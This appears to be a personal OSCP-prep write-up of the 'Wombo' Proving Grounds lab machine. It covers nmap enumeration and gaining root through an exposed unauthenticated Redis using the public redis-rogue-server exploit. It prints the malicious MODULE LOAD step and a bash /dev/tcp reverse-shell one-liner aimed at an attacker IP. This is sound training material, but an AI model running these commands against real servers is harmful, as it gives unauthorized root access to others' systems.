Braindump
Read BlogpostsLet's Connect
  • Introduction: My OSCP Journey
  • Writeup Index
  • OSCP Machine Writeups
    • 🔥PG - Practice
      • Shenzi
      • DVR4
      • Resourced
      • Kevin
      • Nara
      • Jacko
      • Authby
      • Access
      • Internal
      • Hutch
      • Algernon
      • HelpDesk
      • Squid
      • Hepet
      • Craft2
      • ClamAV
      • Pelican
      • Payday
      • Snookums
      • Bratarina
      • Nibbles
      • Hetemit
      • Hawat
      • Astronaut
      • Exfiltrated
      • Fanatastic
      • Wombo
      • Levram
      • LaVita
    • 💣HackTheBox
      • Devel
      • Legacy
      • Intelligence
        • Learning
      • Blackfield
        • PrivEsc - SeBackupPrivilege
      • Sauna
      • Bastard
      • Arctic
      • Forest
      • Active
      • SecNotes
      • Access
  • Preparation Notes
    • Tips and Tricks
      • File Transfer
      • Download a file - Windows CLI
      • Bypassing Firewall/Defender/UAC
      • Accessing File
      • Reverse Shell
      • OneLiner - Reverse/bind Shell
      • OneLiner - MSFVenom
    • Enumeration Techniques
      • System and Network Enumeration
      • Web Enumeration
      • Service Enum
      • CMS
    • Exploitation
      • Exploiting Web Apps
      • Exploiting Wordpress
      • Public Exploits
    • Privilege Escalation
      • Linux Privilege Escalation
        • Disk Group PrivEsc
      • Windows Privilege Escalation
    • Active Directory
      • Enumeration
      • AD Attacks
      • mimikatz
      • Lateral movement
    • Pivoting and Networking
      • SSH Port Forwarding
      • Ligolo-ng
    • Password Cracking
Powered by GitBook
On this page
  • Summary
  • 🧵 Let's Unpack

Was this helpful?

  1. OSCP Machine Writeups
  2. PG - Practice

Wombo

Summary

  • Discovered multiple open ports including Redis, MongoDB, and a NodeBB instance.

  • Redis (port 6379) was exposed and vulnerable to rogue server attack.

  • Used a public exploit to achieve unauthenticated RCE as root via Redis.

  • Gained a root shell directly without requiring privilege escalation.

🧵 Let's Unpack

Enumeration

sudo nmap -sV -sC -p- -Pn 192.168.229.69 --open

Open Ports:

  • 22/tcp → OpenSSH 7.4p1 Debian

  • 80/tcp → nginx 1.10.3 (default page)

  • 6379/tcp → Redis 5.0.9

  • 8080/tcp → NodeBB forum interface

  • 27017/tcp → MongoDB 4.0.18 (requires auth)

📌 Interesting Findings:

  • Redis port open to the world with no authentication required

  • NodeBB and MongoDB are red herrings (rabbit holes)


Initial Foothold

🎯 Target: Redis (port 6379)

# Clone and execute exploit to load malicious module via Redis protocol
git clone https://github.com/n0b0dyCN/redis-rogue-server.git
cd redis-rogue-server

# Configure rogue server with malicious .so file
python3 rogue_server.py

# On target Redis host
redis-cli -h <victim-ip> -p 6379
> MODULE LOAD ./exp.so
> SYSTEM /bin/bash -c "bash -i >& /dev/tcp/<your-ip>/<port> 0>&1"
  • 🪝 Reverse shell received with root privileges


Privilege Escalation

❌ Not required.

Redis exploit gave direct root access, eliminating the need for additional privilege escalation steps.

PreviousFanatasticNextLevram

Last updated 1 month ago

Was this helpful?

Exploited with

🔥
redis-rogue-server
https://github.com/n0b0dyCN/redis-rogue-server